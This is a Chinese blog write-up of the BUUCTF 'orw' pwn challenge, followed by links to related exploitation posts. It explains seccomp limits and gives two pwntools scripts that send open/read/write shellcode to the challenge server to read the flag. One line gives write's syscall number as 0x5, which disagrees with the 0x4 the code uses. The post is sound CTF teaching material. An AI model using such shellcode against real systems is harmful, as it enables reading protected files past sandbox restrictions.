【CTF】【PWN】orw

最新推荐文章于 2024-08-04 10:59:25 发布
最新推荐文章于 2024-08-04 10:59:25 发布
阅读量1.3k 收藏 12
点赞数 3
分类专栏: pwn ctf 文章标签: python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50819561/article/details/120662408
版权

沙盒机制 系统调用 汇编语言 shellcraft 安全攻防
关键词由CSDN通过智能技术生成
pwn 同时被 2 个专栏收录
10 篇文章 2 订阅
订阅专栏
ctf
10 篇文章 0 订阅
订阅专栏

在这里插入图片描述
这是沙盒机制,就是限制你能使用的syscall。
seccomp-tools这个工具能快速地查出你能使用地syscall。
在这里插入图片描述
我们能使用的常用的构造攻击链的只有open,read,write。
但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。
有两种方法,一种直接写汇编,一种利用shellcraft构造。
下面是汇编:
首先流程是这样的:
open(’文件名‘,0,0)
read(文件描述符,‘文件名’,读取大小)
write(1,‘文件名’,写大小)
我们想要读取flag文件里的内容,所以应该构造如下
open(‘flag’,0,0)
read(3,‘flag’,0x30)
write(1,‘flag’,0x30)
那么就可以有如下的汇编代码
在这里插入图片描述
第一行payload中的push 0x00;push 0x67616c66相当于push /x00galf,因为是小端序,倒过来就是push flag/x00。
open的系统调用号是0x5,read是0x3,write是0x5.
代码如下:

from pwn import *
from LibcSearcher import *
r=remote('node4.buuoj.cn','29583')
#r=process('./a')
elf=ELF('./a')
context.log_level = 'debug'
libc = ELF("./libc-2.23.so")
#context.terminal = ['tmux','splitw','-h']

payload=asm('push 0x00;push 0x67616c66;mov ebx,esp;mov eax,0x5;mov ecx,0;mov edx,0;int 0x80;')#
payload+=asm('mov eax,0x3;mov ecx,ebx;mov edx,0x30;mov ebx,0x3;int 0x80;')#
payload+=asm('mov eax,0x4;mov ebx,0x1;int 0x80')#
r.recvuntil('Give my your shellcode:')
r.sendline(payload)
flag=r.recv(200)
print(flag)

利用shellcraft代码如下:

from pwn import *
from LibcSearcher import *


r=remote('node4.buuoj.cn','29583')
#r=process('./a')
elf=ELF('./a')
context.log_level = 'debug'
libc = ELF("./libc-2.23.so")
#context.terminal = ['tmux','splitw','-h']

payload=shellcraft.open('./flag')
payload+=shellcraft.read(3,'./flag',100)
payload+=shellcraft.write(1,'./flag',100)
payload=asm(payload)#记得要把代码转换成汇编语言
r.recvuntil('Give my your shellcode:')
r.sendline(payload)
flag=r.recv(100)
print(flag)
永远在深夜里就好了
关注
专栏目录
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4424
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
BUUCTF pwnable_orw
BengDouLove的博客
04-12 530
这道题又是一道seccomp,,这个orw_seccomp函数里面说的傻我看不懂。。。 反正根据套路肯定还是不能用system,,还是通过 open,read,write,来泄露flag文件 写这种shellcode写的方法一个是直接汇编 或者 可以用pwntools里面带的shellcraft pwntools官方文档 其他的没啥可说的,看一下代码 shellcraft: #cod...
pwnorw
weixin_43960998的博客
06-19 1795
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
[CTF]-PWNORW题型综合解析
最新发布
2301_79326813的博客
08-04 1052
这里使用mmap函数创造了一个内存映射区域从地址0x123000开始,大小位0x1000权限为可写可执行(可读0x1,可写0x2,可执行0x3)设置为私有映射()和匿名映射(MAP_SHAREDMAP_FIXEDMAP_LOCKED将要映射的文件描述符设为-1,表示不关联任何文件剩下的0指的就是偏移量了,没有偏移这里首先初始化将所有系统调用禁用,并且后面使用seccomp_rule_add函数添加了可使用的系统调用。根据64位系统调用号,分别是:read:系统调用号为0。
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1384
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
buuctf pwnable_orw
qq_42728977的博客
04-12 342
限制条件下的shellcode 参考链接: https://www.cnblogs.com/chrysanthemum/p/12323183.html http://www.chiange.com/pwnable-tw-orw/
CTF比赛PWN题sgtlibc通用快速解题框架
serfend's blog
07-07 1622
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解题框架例题:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例题:buuctf pwnable_orw libc-leak_x86_puts 例题:ctfshow ret2libc_64 内部赛_签到题 libc-leak_x86_write_pure 例题:buuctf jarvisoj_level1 libc-leak_x86_writ
pwn -- glibc-2.29漏洞利用学习
lifanxin的博客
04-30 593
glibc-2.29概述Tcache Stashing Unlink Attack任意位置写入较大值总结 概述   这里记录下版本为libc-2.29.so的漏洞利用方式,一是防止遗忘,二是供大家学习。 Tcache Stashing Unlink Attack   攻击原理和细节代码我就不分析了,着重记录下攻击方式和效果,这里利用tcache stashing unlink attack可以实现两种攻击效果:   1、任意位置写入较大值   2、任意地址chunk分配 任意位置写入较大值   该漏洞发生在
pwn】2021 鹤壁杯 wp
woodwhale的博客
10-09 3761
pwn】2021 鹤壁杯 wp 前言 这场比较简单,但是也看到了自己急于求成的下场,基础知识非常不牢固,很多调试手段都太拉了,逆向能力也是非常差,还是得跟着师傅们继续学啊! 1、ret2libc1 就是最简单的ret2libc1,好像还有后门,我给忘了 2、ret2libc3 也是基本的ret2libc3,puts.plt泄露puts.got从而泄露libc.address,system(“sh”) 要注意一下栈平衡,在rop之前加个ret 3、onecho 这题,虽然很简单,但是我太拉了,不会动调,导致
2020SCTF PWN部分wp
starssgo的博客
07-06 1020
人在楼顶,感觉良好。 目前的自己还是只能做一些常规的Liunx下的PWN题,对其他的我就是个废物了。 这里写目录CoolCodesnake总结 CoolCode 这个题主要是shellcode非常的难构造。 比赛的时候whali3n51大师傅做出来的,我只是复现了他的payload。 本题目沙盒只剩下了0,1,5,9四个函数调用。 当我们想构造ORW的时候,没有open函数怎么办。 这个时候我们知道5在32位下是open。 那么我们考虑用retfq修改cs寄存器从而修改运行模式。 具体参考:https:/
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2463
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021年的鹏程杯比赛的pwn题,题目链接如下:2021-鹏程杯-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
[BUUCTF]PWN——pwnable_orw
mcmuyanga的博客
11-10 1952
pwnable_orw 附件 步骤: 例行检查,32位程序,开启了canary 本地运行一下程序,看看大概的情况,提示我们输入shellcode 32位ida载入,检索字符串,没看见什么可以直接利用的,直接看main函数 orw_seccomp函数 prctl在百度后知道了是沙盒机制,具体的看这篇文章 prctl seccomp相当于内核中的一种安全机制,正常情况下,程序可以使用所有的syscall,但是当劫持程序流程之后通过exeve来呼叫syscall得到shell时seccomp边
[BUUCTF-pwn]——pwnable_orw   (ORW
Y_peak的博客
03-16 1204
[BUUCTF-pwn]——pwnable_orw 第一次碰到orw的问题,所谓orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 这个时候可以通过seccomptools,来查看 注意看到prctl就是将系统调用给你禁止了 exploit from pwn import * context.arch = 'i386' p = remote('node3.buuoj.cn',28626) shellcode = she
pwnable_orw
m0_58426698的博客
03-21 402
pwn的最经典的orw的题目,顺便学了一下手写汇编,对传参有了更深的理解
PWN_3 ORW
weixin_30781107的博客
02-18 695
2018-02-18 15:44:34 Open Write Read open函数 #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> int open(const char *pathname, int...
pwnable.tw---orw
杀生丸?不,其实我要的是桔梗
05-01 1556
pwnable.tw—orw 这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。 题目分析: 照例: 就开了栈保护,虽然都没有什么用。 题目开始就是让你输入shellcode。 就用msf随便试了几下,发现有些被过滤了。 调试看看: 发现调用了seccomp,百度了下是一个linu...
pwn】[FSCTF 2023]Fi3h --orw利用,沙箱检测
question55的博客
11-19 208
【代码】【pwn】[FSCTF 2023]Fi3h --orw利用,沙箱检测。
pwn中沙盒保护之orw绕过
wangxunyu6的博客
03-09 1058
简单来说开启沙盒保护后execve被禁用,也就是说即使我们拿到shell也没有用。我们可以使用seccomp-tools dump指令进行查看。
ctf pwn 计算器
10-05
引用是一段代码,它使用了Pythonpwn库来进行CTF中的pwn攻击。pwn攻击是指通过分析程序本身的漏洞,编写利用脚本来获取主机权限。这种攻击需要对程序进行深入分析,了解操作系统的特性和相关漏洞。因此,CTF pwn攻击是一个相对较难的领域。 对于你提到的"计算器",如果你是指CTF中的pwn题目中的一个计算器程序,那么你需要先进行程序的分析,找到可能存在的漏洞点。一旦找到漏洞点,你可以通过构造特定输入来利用漏洞,从而获取权限。 在学习CTF pwn攻击时,首先要有扎实的基础知识,包括C语言、汇编语言、Python编程、操作系统原理和Linux操作等方面的知识。这些基础知识将为你提供分析和理解程序的能力。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值